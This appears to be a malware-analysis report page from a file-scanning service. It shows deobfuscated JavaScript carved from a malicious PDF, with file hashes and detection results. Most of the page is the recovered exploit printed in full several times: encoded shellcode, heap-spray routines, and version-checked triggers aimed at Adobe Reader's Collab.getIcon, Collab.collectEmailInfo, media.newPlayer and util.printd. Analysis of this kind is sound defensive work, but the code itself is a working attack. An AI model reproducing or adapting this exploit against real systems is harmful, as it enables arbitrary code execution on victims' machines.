%u23eb%u4840%u5f43%u5b57%u8b66%u3c03%u7430%u2c1b%uc063%u04e0%uec80%u8043%u0fe4%uc402%uea34%u0788%u4343%ueb47%ue8e3%uffd8%uffff%u4e69%u4963%u4d71%u4571%u4d71%u4d71%u4d6b%u4563%u4d71%u4d71%u4d71%u4d71%u446e%u4e69%u4463%u4967%u4d72%u4d6d%u4d71%u4463%u4d70%u4f72%u526b%u4364%u4d72%u4963%u506a%u4c71%u4971%u4967%u4571%u4366%u4f6c%u4a67%u446a%u4a6c%u4866%u4464%u506a%u4a64%u4871%u476c%u4566%u4b63%u4c6c%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4f67%u4c64%u4e6f%u4d6c%u516b%u4e67%u4d70%u4d71%u4d71%u4d71%u4469%u4d6d%u4971%u4469%u4d6c%u4972%u4a67%u4469%u4d6d%u4571%u4669%u4c69%u4a65%u4d72%u4d6d%u4d71%u4964%u4a69%u4468%u5268%u4d72%u4d6d%u4d71%u4c70%u4665%u4e68%u4f71%u4563%u506f%u4e71%u4d71%u4d71%u4c69%u5065%u5171%u4b63%u4f64%u4964%u4c70%u4d65%u4c70%u4b66%u4f6b%u4368%u476e%u4c65%u4469%u4c68%u4665%u4d72%u4d6d%u4d71%u4f6b%u4469%u4f71%u4f6b%u4470%u4d66%u516c%u5171%u4f6d%u4f6d%u4463%u5164%u4669%u4c68%u4e63%u4d72%u4d6d%u4d71%u4c70%u4f64%u4a68%u4d71%u4d6f%u4d71%u4d71%u4463%u4c72%u436b%u4d71%u4f6e%u4864%u4c6a%u4e65%u4d72%u4d6d%u4d71%u4c69%u4564%u4864%u516c%u5171%u4470%u5265%u506c%u4671%u4f6d%u4e69%u4764%u4d71%u4d72%u4d71%u4d71%u4b6c%u5263%u4669%u4c68%u4666%u4d72%u4d6d%u4d71%u4469%u4563%u5271%u4d71%u4571%u4d71%u4d71%u4d6e%u436b%u4d6d%u4864%u4c6a%u4668%u4d72%u4d6d%u4d71%u4669%u4c69%u4e66%u4d72%u4d6d%u4d71%u4c71%u5265%u4669%u4c69%u5266%u4d72%u4d6d%u4d71%u436b%u4d71%u436b%u4d71%u436b%u4d71%u4864%u4c68%u4666%u4d72%u4d6d%u4d71%u4864%u4c6a%u4a68%u4d72%u4d6d%u4d71%u4469%u4c68%u4e66%u4d72%u4d6d%u4d71%u4a69%u4468%u4a66%u4d72%u4d6d%u4d71%u4469%u4c6a%u4666%u4d72%u4d6d%u4d71%u4a69%u4c69%u5068%u4e72%u4d6d%u4d71%u4d6e%u4f6e%u436b%u4d71%u506e%u526e%u4f6e%u4b6e%u4864%u4c68%u4e63%u4d72%u4d6d%u4d71%u4864%u4c67%u5268%u4d72%u4d6d%u4d71%u4471%u4d65%u526c%u4b71%u4463%u4d6b%u4469%u4c68%u4e66%u4d72%u4d6d%u4d71%u4469%u4f71%u4a70%u526f%u4d6e%u516d%u4f6d%u516c%u4971%u4469%u4c68%u4666%u4d72%u4d6d%u4d71%u4f6d%u4663%u446e%u4864%u4864%u4864%u4469%u4c68%u4e66%u4d72%u4d6d%u4d71%u4c70%u4665%u4368%u4364%u4464%u4964%u4a64%u4463%u4571%u4469%u4f71%u4470%u4b65%u516c%u4f71%u4f6d%u4e6d%u4470%u4a65%u4b6c%u5164%u4c69%u4f65%u5171%u4469%u4468%u5266%u4d72%u4d6d%u4d71%u4668%u4d71%u5071%u4d71%u4d71%u5167%u4b63%u4a64%u4469%u4468%u4e66%u4d72%u4d6d%u4d71%u4864%u4c68%u4666%u4d72%u4d6d%u4d71%u4864%u4c6a%u5265%u4d72%u4d6d%u4d71%u4864%u4c68%u5266%u4d72%u4d6d%u4d71%u4c65%u4864%u4c68%u4666%u4d72%u4d6d%u4d71%u4864%u4c6a%u5265%u4d72%u4d6d%u4d71%u436b%u4d71%u4864%u4c6a%u4665%u4d72%u4d6d%u4d71%u4c65%u4d6b%u4469%u4c68%u4a65%u4d72%u4d6d%u4d71%u4c71%u4f6c%u4970%u4469%u4f6c%u456c%u4c71%u4c68%u4a65%u4d72%u4d6d%u4d71%u4f6e%u4469%u476d%u4572%u4469%u4f6c%u4d6f%u4c71%u4c68%u4a65%u4d72%u4d6d%u4d71%u4c70%u4d65%u4c70%u4b66%u4f6e%u4469%u4f70%u4c71%u4c68%u4a65%u4d72%u4d6d%u4d71%u4967%u4570%u4d63%u516c%u5071%u4e65%u4365%u4a71%u4c71%u4d66%u4463%u5164%u4470%u5072%u516c%u4671%u476e%u4c69%u4f65%u5171%u466d%u516c%u5270%u4463%u4966%u476e%u4469%u4f66%u476e%u446f%u4f6e%u4d6f%u446f%u4c6a%u4a65%u4d72%u4d6d%u4d71%u4e66%u4363%u4c71%u4f6e%u516f%u4c71%u4c6a%u4a65%u4d72%u4d6d%u4d71%u4871%u5068%u4b71%u4e65%u4d63%u4b71%u4c71%u4f6d%u4972%u4c71%u4c69%u4a65%u4d72%u4d6d%u4d71%u4469%u4d71%u4c71%u4c69%u4a65%u4d72%u4d6d%u4d71%u4669%u5071%u4463%u4e71%u476e%u4e6b%u4c65%u3030"
function exp8() {
var spd = "%u000a%u000a%u000a%u000a";
var esc = unescape;
var spr = esc(urpl(spd));
var of = repeat(4096, spr);
var a=["\x5f\x4e\x2e\x62\x75\x6e\x64\x6c\x65"];//javascript comment
Collab["\x67\x65\x74\x49\x63\x6f\x6e"](of+a[0x0]);
}
function exp9() {
var esprpl=unescape;
var sc = esprpl(urpl(s));
var ret = unescape("%u0c0c%u0c0c");
var sc2 = unescape("%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u6b62%u546e%u596a%u6c76%u506a%u5470%u666f%u7441%u4356%u586c%u726d%u4153%u4b4a%u624c%u7948%u4659%u6156%u7761%u7051%u7842%u5342%u4a64%u6365%u7464%u4972%u5766%u534d%u7569");
while(ret.length <= 0x8000) ret+=ret;
ret=ret.substring(0,0x8000 - s.length);
memory=new Array();
for(i=0;i<0x2000;i++) {
memory[i]= ret + sc;
}
util.printd("jbBFAXmYeqFJUPOXePHkjhAybWoldsgWfmBw", new Date());
util.printd("noCXCPHRXLpZKyNpKJJWxBkvpjKLYwpMfmCG", new Date());
try{eval("this.m"+"ed"+"ia.n"+"ewPl"+"ayer(null)");}
catch(e) {}
util.printd(sc2, new Date());
}
function start()
{
var esprpl=unescape;
var sc = esprpl(urpl(s));
if (app.viewerVersion >= 7.0)
{
plin = repeat(1124,unescape("%u0b0b%u0028%u06eb%u06eb")) + unescape("%u0b0b%u0028%u0aeb%u0aeb") + unescape("%u4346%u4a4b") + repeat(122,unescape("%u0b0b%u0028%u06eb%u06eb")) + unescape("%u4a4b%u4748%u4a4b%u4748%u4a4b%u4748") + sc + repeat(1256,unescape("%u4a4b%u4748"));
}
else
{
ef6 = unescape("%uf6eb%uf6eb") + unescape("%u0b0b%u0019");
plin = repeat(80,unescape("%u4141%u4141")) + sc + repeat(80,unescape("%u4241%u4142"))+ unescape("%uf7e9%ufff9")
+unescape("%uffff%uffff") + unescape("%uf6eb%uf4eb") + unescape("%uf2eb%uf1eb");
while ((plin.length % 8) != 0)
plin = unescape("%u4141") + plin;
plin += repeat(2626,ef6);
}
if (app.viewerVersion >= 6.0)
{
var a=[];//javascript for adobe
Collab["\x63\x6f\x6c\x6c\x65\x63\x74\x45\x6d\x61\x69\x6c\x49\x6e\x66\x6f"]({subj:a[0x0],msg:plin});
}
}
var ver = app.viewerVersion
if ((ver >= 9.1) || ((ver > 8.102) && (ver < 9.0)))
{
var inBrowser = this.external;
if (inBrowser)
var shaft = app.setTimeOut("exp9()",1200);
else
exp9();
}
else
{
if(ver >= 8.0)
{
xxsc(s);
var inBrowser = this.external;
if (inBrowser)
var shaft = app.setTimeOut("exp8()",1200);
else
exp8();
}
else
{
if(ver >= 6.0)
{
var inBrowser = this.external;
if (inBrowser)
var shaft = app.setTimeOut("start()",1200);
else
start();
}
else
{
while(1){};
}
}
}
|
|||
generic_stage_recovery_002.js |
deobfuscated-js | generic stage recovery split-literal-normalize from JavaScript object 43 at offset 0x2465 | 6472 bytes |
SHA-256: 3de18d643bbbfed4f5e975007e20182dadadd1ddc7157ec7a58d63e1ae628ffc |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 21 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
function urpl(sc){
var keyu= "%u";
var re = /XX/g;
sc = sc.replace(re,keyu);
return sc;
}
function xxsc(sc){
var sprdataxx = "XX4a4bXX4647";
var esprpl=unescape;
var urpled = esprpl(urpl(sc));
var blknum = 0x41000;
var sprdata = esprpl(urpl(sprdataxx));
while(sprdata.length<blknum)
sprdata+=sprdata;
sprblk=sprdata.substring(0,sprdata.length);
scblk=urpled.substring(0,urpled.length);
memory=new Array();
var k = 0;
while (k < 200)
{
memory[k]=sprblk+scblk;
k++;
}
}
function repeat(count,what){
var v = "";
while (--count >= 0) v += what;
return v;
}
var s = "XX23ebXX4840XX5f43XX5b57XX8b66XX3c03XX7430XX2c1bXXc063XX04e0XXec80XX8043XX0fe4XXc402XXea34XX0788XX4343XXeb47XXe8e3XXffd8XXffffXX4e69XX4963XX4d71XX4571XX4d71XX4d71XX4d6bXX4563XX4d71XX4d71XX4d71XX4d71XX446eXX4e69XX4463XX4967XX4d72XX4d6dXX4d71XX4463XX4d70XX4f72XX526bXX4364XX4d72XX4963XX506aXX4c71XX4971XX4967XX4571XX4366XX4f6cXX4a67XX446aXX4a6cXX4866XX4464XX506aXX4a64XX4871XX476cXX4566XX4b63XX4c6cXX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4f67XX4c64XX4e6fXX4d6cXX516bXX4e67XX4d70XX4d71XX4d71XX4d71XX4469XX4d6dXX4971XX4469XX4d6cXX4972XX4a67XX4469XX4d6dXX4571XX4669XX4c69XX4a65XX4d72XX4d6dXX4d71XX4964XX4a69XX4468XX5268XX4d72XX4d6dXX4d71XX4c70XX4665XX4e68XX4f71XX4563XX506fXX4e71XX4d71XX4d71XX4c69XX5065XX5171XX4b63XX4f64XX4964XX4c70XX4d65XX4c70XX4b66XX4f6bXX4368XX476eXX4c65XX4469XX4c68XX4665XX4d72XX4d6dXX4d71XX4f6bXX4469XX4f71XX4f6bXX4470XX4d66XX516cXX5171XX4f6dXX4f6dXX4463XX5164XX4669XX4c68XX4e63XX4d72XX4d6dXX4d71XX4c70XX4f64XX4a68XX4d71XX4d6fXX4d71XX4d71XX4463XX4c72XX436bXX4d71XX4f6eXX4864XX4c6aXX4e65XX4d72XX4d6dXX4d71XX4c69XX4564XX4864XX516cXX5171XX4470XX5265XX506cXX4671XX4f6dXX4e69XX4764XX4d71XX4d72XX4d71XX4d71XX4b6cXX5263XX4669XX4c68XX4666XX4d72XX4d6dXX4d71XX4469XX4563XX5271XX4d71XX4571XX4d71XX4d71XX4d6eXX436bXX4d6dXX4864XX4c6aXX4668XX4d72XX4d6dXX4d71XX4669XX4c69XX4e66XX4d72XX4d6dXX4d71XX4c71XX5265XX4669XX4c69XX5266XX4d72XX4d6dXX4d71XX436bXX4d71XX436bXX4d71XX436bXX4d71XX4864XX4c68XX4666XX4d72XX4d6dXX4d71XX4864XX4c6aXX4a68XX4d72XX4d6dXX4d71XX4469XX4c68XX4e66XX4d72XX4d6dXX4d71XX4a69XX4468XX4a66XX4d72XX4d6dXX4d71XX4469XX4c6aXX4666XX4d72XX4d6dXX4d71XX4a69XX4c69XX5068XX4e72XX4d6dXX4d71XX4d6eXX4f6eXX436bXX4d71XX506eXX526eXX4f6eXX4b6eXX4864XX4c68XX4e63XX4d72XX4d6dXX4d71XX4864XX4c67XX5268XX4d72XX4d6dXX4d71XX4471XX4d65XX526cXX4b71XX4463XX4d6bXX4469XX4c68XX4e66XX4d72XX4d6dXX4d71XX4469XX4f71XX4a70XX526fXX4d6eXX516dXX4f6dXX516cXX4971XX4469XX4c68XX4666XX4d72XX4d6dXX4d71XX4f6dXX4663XX446eXX4864XX4864XX4864XX4469XX4c68XX4e66XX4d72XX4d6dXX4d71XX4c70XX4665XX4368XX4364XX4464XX4964XX4a64XX4463XX4571XX4469XX4f71XX4470XX4b65XX516cXX4f71XX4f6dXX4e6dXX4470XX4a65XX4b6cXX5164XX4c69XX4f65XX5171XX4469XX4468XX5266XX4d72XX4d6dXX4d71XX4668XX4d71XX5071XX4d71XX4d71XX5167XX4b63XX4a64XX4469XX4468XX4e66XX4d72XX4d6dXX4d71XX4864XX4c68XX4666XX4d72XX4d6dXX4d71XX4864XX4c6aXX5265XX4d72XX4d6dXX4d71XX4864XX4c68XX5266XX4d72XX4d6dXX4d71XX4c65XX4864XX4c68XX4666XX4d72XX4d6dXX4d71XX4864XX4c6aXX5265XX4d72XX4d6dXX4d71XX436bXX4d71XX4864XX4c6aXX4665XX4d72XX4d6dXX4d71XX4c65XX4d6bXX4469XX4c68XX4a65XX4d72XX4d6dXX4d71XX4c71XX4f6cXX4970XX4469XX4f6cXX456cXX4c71XX4c68XX4a65XX4d72XX4d6dXX4d71XX4f6eXX4469XX476dXX4572XX4469XX4f6cXX4d6fXX4c71XX4c68XX4a65XX4d72XX4d6dXX4d71XX4c70XX4d65XX4c70XX4b66XX4f6eXX4469XX4f70XX4c71XX4c68XX4a65XX4d72XX4d6dXX4d71XX4967XX4570XX4d63XX516cXX5071XX4e65XX4365XX4a71XX4c71XX4d66XX4463XX5164XX4470XX5072XX516cXX4671XX476eXX4c69XX4f65XX5171XX466dXX516cXX5270XX4463XX4966XX476eXX4469XX4f66XX476eXX446fXX4f6eXX4d6fXX446fXX4c6aXX4a65XX4d72XX4d6dXX4d71XX4e66XX4363XX4c71XX4f6eXX516fXX4c71XX4c6aXX4a65XX4d72XX4d6dXX4d71XX4871XX5068XX4b71XX4e65XX4d63XX4b71XX4c71XX4f6dXX4972XX4c71XX4c69XX4a65XX4d72XX4d6dXX4d71XX4469XX4d71XX4c71XX4c69XX4a65XX4d72XX4d6dXX4d71XX4669XX5071XX4463XX4e71XX476eXX4e6bXX4c65XX3030"
function exp8() {
var spd = "XX000aXX000aXX000aXX000a";
var esc = unescape;
var spr = esc(urpl(spd));
var of = repeat(4096, spr);
var a=["\x5f\x4e\x2e\x62\x75\x6e\x64\x6c\x65"];//javascript comment
Collab["\x67\x65\x74\x49\x63\x6f\x6e"](of+a[0x0]);
}
function exp9() {
var esprpl=unescape;
var sc = esprpl(urpl(s));
var ret = unescape("%u0c0c%u0c0c");
var sc2 = unescape("%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u6b62%u546e%u596a%u6c76%u506a%u5470%u666f%u7441%u4356%u586c%u726d%u4153%u4b4a%u624c%u7948%u4659%u6156%u7761%u7051%u7842%u5342%u4a64%u6365%u7464%u4972%u5766%u534d%u7569");
while(ret.length <= 0x8000) ret+=ret;
ret=ret.substring(0,0x8000 - s.length);
memory=new Array();
for(i=0;i<0x2000;i++) {
memory[i]= ret + sc;
}
util.printd("jbBFAXmYeqFJUPOXePHkjhAybWoldsgWfmBw", new Date());
util.printd("noCXCPHRXLpZKyNpKJJWxBkvpjKLYwpMfmCG", new Date());
try{eval("this.media.newPlayer(null)");}
catch(e) {}
util.printd(sc2, new Date());
}
function start()
{
var esprpl=unescape;
var sc = esprpl(urpl(s));
if (app.viewerVersion >= 7.0)
{
plin = repeat(1124,unescape("%u0b0b%u0028%u06eb%u06eb")) + unescape("%u0b0b%u0028%u0aeb%u0aeb") + unescape("%u4346%u4a4b") + repeat(122,unescape("%u0b0b%u0028%u06eb%u06eb")) + unescape("%u4a4b%u4748%u4a4b%u4748%u4a4b%u4748") + sc + repeat(1256,unescape("%u4a4b%u4748"));
}
else
{
ef6 = unescape("%uf6eb%uf6eb") + unescape("%u0b0b%u0019");
plin = repeat(80,unescape("%u4141%u4141")) + sc + repeat(80,unescape("%u4241%u4142"))+ unescape("%uf7e9%ufff9")
+unescape("%uffff%uffff") + unescape("%uf6eb%uf4eb") + unescape("%uf2eb%uf1eb");
while ((plin.length % 8) != 0)
plin = unescape("%u4141") + plin;
plin += repeat(2626,ef6);
}
if (app.viewerVersion >= 6.0)
{
var a=[];//javascript for adobe
Collab["\x63\x6f\x6c\x6c\x65\x63\x74\x45\x6d\x61\x69\x6c\x49\x6e\x66\x6f"]({subj:a[0x0],msg:plin});
}
}
var ver = app.viewerVersion
if ((ver >= 9.1) || ((ver > 8.102) && (ver < 9.0)))
{
var inBrowser = this.external;
if (inBrowser)
var shaft = app.setTimeOut("exp9()",1200);
else
exp9();
}
else
{
if(ver >= 8.0)
{
xxsc(s);
var inBrowser = this.external;
if (inBrowser)
var shaft = app.setTimeOut("exp8()",1200);
else
exp8();
}
else
{
if(ver >= 6.0)
{
var inBrowser = this.external;
if (inBrowser)
var shaft = app.setTimeOut("start()",1200);
else
start();
}
else
{
while(1){};
}
}
}
|
|||
generic_stage_recovery_003.js |
deobfuscated-js | generic stage recovery split-literal-normalize -> marker-XX-to-%u from combined JavaScript objects at offset 0x2430 | 5847 bytes |
SHA-256: 426159a7abbfc96cfc9f011196abdb71becccce0b83f6ff9457fc5766c986452 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 21 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
%u23eb%u4840%u5f43%u5b57%u8b66%u3c03%u7430%u2c1b%uc063%u04e0%uec80%u8043%u0fe4%uc402%uea34%u0788%u4343%ueb47%ue8e3%uffd8%uffff%u4e69%u4963%u4d71%u4571%u4d71%u4d71%u4d6b%u4563%u4d71%u4d71%u4d71%u4d71%u446e%u4e69%u4463%u4967%u4d72%u4d6d%u4d71%u4463%u4d70%u4f72%u526b%u4364%u4d72%u4963%u506a%u4c71%u4971%u4967%u4571%u4366%u4f6c%u4a67%u446a%u4a6c%u4866%u4464%u506a%u4a64%u4871%u476c%u4566%u4b63%u4c6c%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4f67%u4c64%u4e6f%u4d6c%u516b%u4e67%u4d70%u4d71%u4d71%u4d71%u4469%u4d6d%u4971%u4469%u4d6c%u4972%u4a67%u4469%u4d6d%u4571%u4669%u4c69%u4a65%u4d72%u4d6d%u4d71%u4964%u4a69%u4468%u5268%u4d72%u4d6d%u4d71%u4c70%u4665%u4e68%u4f71%u4563%u506f%u4e71%u4d71%u4d71%u4c69%u5065%u5171%u4b63%u4f64%u4964%u4c70%u4d65%u4c70%u4b66%u4f6b%u4368%u476e%u4c65%u4469%u4c68%u4665%u4d72%u4d6d%u4d71%u4f6b%u4469%u4f71%u4f6b%u4470%u4d66%u516c%u5171%u4f6d%u4f6d%u4463%u5164%u4669%u4c68%u4e63%u4d72%u4d6d%u4d71%u4c70%u4f64%u4a68%u4d71%u4d6f%u4d71%u4d71%u4463%u4c72%u436b%u4d71%u4f6e%u4864%u4c6a%u4e65%u4d72%u4d6d%u4d71%u4c69%u4564%u4864%u516c%u5171%u4470%u5265%u506c%u4671%u4f6d%u4e69%u4764%u4d71%u4d72%u4d71%u4d71%u4b6c%u5263%u4669%u4c68%u4666%u4d72%u4d6d%u4d71%u4469%u4563%u5271%u4d71%u4571%u4d71%u4d71%u4d6e%u436b%u4d6d%u4864%u4c6a%u4668%u4d72%u4d6d%u4d71%u4669%u4c69%u4e66%u4d72%u4d6d%u4d71%u4c71%u5265%u4669%u4c69%u5266%u4d72%u4d6d%u4d71%u436b%u4d71%u436b%u4d71%u436b%u4d71%u4864%u4c68%u4666%u4d72%u4d6d%u4d71%u4864%u4c6a%u4a68%u4d72%u4d6d%u4d71%u4469%u4c68%u4e66%u4d72%u4d6d%u4d71%u4a69%u4468%u4a66%u4d72%u4d6d%u4d71%u4469%u4c6a%u4666%u4d72%u4d6d%u4d71%u4a69%u4c69%u5068%u4e72%u4d6d%u4d71%u4d6e%u4f6e%u436b%u4d71%u506e%u526e%u4f6e%u4b6e%u4864%u4c68%u4e63%u4d72%u4d6d%u4d71%u4864%u4c67%u5268%u4d72%u4d6d%u4d71%u4471%u4d65%u526c%u4b71%u4463%u4d6b%u4469%u4c68%u4e66%u4d72%u4d6d%u4d71%u4469%u4f71%u4a70%u526f%u4d6e%u516d%u4f6d%u516c%u4971%u4469%u4c68%u4666%u4d72%u4d6d%u4d71%u4f6d%u4663%u446e%u4864%u4864%u4864%u4469%u4c68%u4e66%u4d72%u4d6d%u4d71%u4c70%u4665%u4368%u4364%u4464%u4964%u4a64%u4463%u4571%u4469%u4f71%u4470%u4b65%u516c%u4f71%u4f6d%u4e6d%u4470%u4a65%u4b6c%u5164%u4c69%u4f65%u5171%u4469%u4468%u5266%u4d72%u4d6d%u4d71%u4668%u4d71%u5071%u4d71%u4d71%u5167%u4b63%u4a64%u4469%u4468%u4e66%u4d72%u4d6d%u4d71%u4864%u4c68%u4666%u4d72%u4d6d%u4d71%u4864%u4c6a%u5265%u4d72%u4d6d%u4d71%u4864%u4c68%u5266%u4d72%u4d6d%u4d71%u4c65%u4864%u4c68%u4666%u4d72%u4d6d%u4d71%u4864%u4c6a%u5265%u4d72%u4d6d%u4d71%u436b%u4d71%u4864%u4c6a%u4665%u4d72%u4d6d%u4d71%u4c65%u4d6b%u4469%u4c68%u4a65%u4d72%u4d6d%u4d71%u4c71%u4f6c%u4970%u4469%u4f6c%u456c%u4c71%u4c68%u4a65%u4d72%u4d6d%u4d71%u4f6e%u4469%u476d%u4572%u4469%u4f6c%u4d6f%u4c71%u4c68%u4a65%u4d72%u4d6d%u4d71%u4c70%u4d65%u4c70%u4b66%u4f6e%u4469%u4f70%u4c71%u4c68%u4a65%u4d72%u4d6d%u4d71%u4967%u4570%u4d63%u516c%u5071%u4e65%u4365%u4a71%u4c71%u4d66%u4463%u5164%u4470%u5072%u516c%u4671%u476e%u4c69%u4f65%u5171%u466d%u516c%u5270%u4463%u4966%u476e%u4469%u4f66%u476e%u446f%u4f6e%u4d6f%u446f%u4c6a%u4a65%u4d72%u4d6d%u4d71%u4e66%u4363%u4c71%u4f6e%u516f%u4c71%u4c6a%u4a65%u4d72%u4d6d%u4d71%u4871%u5068%u4b71%u4e65%u4d63%u4b71%u4c71%u4f6d%u4972%u4c71%u4c69%u4a65%u4d72%u4d6d%u4d71%u4469%u4d71%u4c71%u4c69%u4a65%u4d72%u4d6d%u4d71%u4669%u5071%u4463%u4e71%u476e%u4e6b%u4c65%u3030"
function exp8() {
var spd = "%u000a%u000a%u000a%u000a";
var esc = unescape;
var spr = esc(urpl(spd));
var of = repeat(4096, spr);
var a=["\x5f\x4e\x2e\x62\x75\x6e\x64\x6c\x65"];//javascript comment
Collab["\x67\x65\x74\x49\x63\x6f\x6e"](of+a[0x0]);
}
function exp9() {
var esprpl=unescape;
var sc = esprpl(urpl(s));
var ret = unescape("%u0c0c%u0c0c");
var sc2 = unescape("%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u6b62%u546e%u596a%u6c76%u506a%u5470%u666f%u7441%u4356%u586c%u726d%u4153%u4b4a%u624c%u7948%u4659%u6156%u7761%u7051%u7842%u5342%u4a64%u6365%u7464%u4972%u5766%u534d%u7569");
while(ret.length <= 0x8000) ret+=ret;
ret=ret.substring(0,0x8000 - s.length);
memory=new Array();
for(i=0;i<0x2000;i++) {
memory[i]= ret + sc;
}
util.printd("jbBFAXmYeqFJUPOXePHkjhAybWoldsgWfmBw", new Date());
util.printd("noCXCPHRXLpZKyNpKJJWxBkvpjKLYwpMfmCG", new Date());
try{eval("this.media.newPlayer(null)");}
catch(e) {}
util.printd(sc2, new Date());
}
function start()
{
var esprpl=unescape;
var sc = esprpl(urpl(s));
if (app.viewerVersion >= 7.0)
{
plin = repeat(1124,unescape("%u0b0b%u0028%u06eb%u06eb")) + unescape("%u0b0b%u0028%u0aeb%u0aeb") + unescape("%u4346%u4a4b") + repeat(122,unescape("%u0b0b%u0028%u06eb%u06eb")) + unescape("%u4a4b%u4748%u4a4b%u4748%u4a4b%u4748") + sc + repeat(1256,unescape("%u4a4b%u4748"));
}
else
{
ef6 = unescape("%uf6eb%uf6eb") + unescape("%u0b0b%u0019");
plin = repeat(80,unescape("%u4141%u4141")) + sc + repeat(80,unescape("%u4241%u4142"))+ unescape("%uf7e9%ufff9")
+unescape("%uffff%uffff") + unescape("%uf6eb%uf4eb") + unescape("%uf2eb%uf1eb");
while ((plin.length % 8) != 0)
plin = unescape("%u4141") + plin;
plin += repeat(2626,ef6);
}
if (app.viewerVersion >= 6.0)
{
var a=[];//javascript for adobe
Collab["\x63\x6f\x6c\x6c\x65\x63\x74\x45\x6d\x61\x69\x6c\x49\x6e\x66\x6f"]({subj:a[0x0],msg:plin});
}
}
var ver = app.viewerVersion
if ((ver >= 9.1) || ((ver > 8.102) && (ver < 9.0)))
{
var inBrowser = this.external;
if (inBrowser)
var shaft = app.setTimeOut("exp9()",1200);
else
exp9();
}
else
{
if(ver >= 8.0)
{
xxsc(s);
var inBrowser = this.external;
if (inBrowser)
var shaft = app.setTimeOut("exp8()",1200);
else
exp8();
}
else
{
if(ver >= 6.0)
{
var inBrowser = this.external;
if (inBrowser)
var shaft = app.setTimeOut("start()",1200);
else
start();
}
else
{
while(1){};
}
}
}
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.